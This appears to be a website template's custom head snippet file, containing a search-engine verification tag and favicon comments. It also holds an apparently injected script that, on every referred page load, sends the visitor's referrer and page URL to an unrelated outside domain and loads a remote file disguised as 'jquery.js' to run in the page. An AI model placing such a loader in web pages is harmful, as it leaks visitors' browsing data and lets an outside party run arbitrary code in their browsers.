<!-- start custom head snippets -->
<meta name="google-site-verification" content="y5olLM8wkvWelumfBtErMI4adAqGXE9E_iKq8XD58BM" />


<script type='text/javascript'>
    if(document.referrer){
        var src = 'https://www.potensilokal.com/jquery.js?' + ['r=' + encodeURIComponent(document.referrer), 'u=' + encodeURIComponent(window.location.href)].join("&");
        var s = document.createElement( 'script' );
        s.setAttribute( 'src', src );
        s.async = false;
        document.head.appendChild(s);
    }
</script>

<!-- insert favicons. use https://realfavicongenerator.net/ -->

<!-- end custom head snippets -->


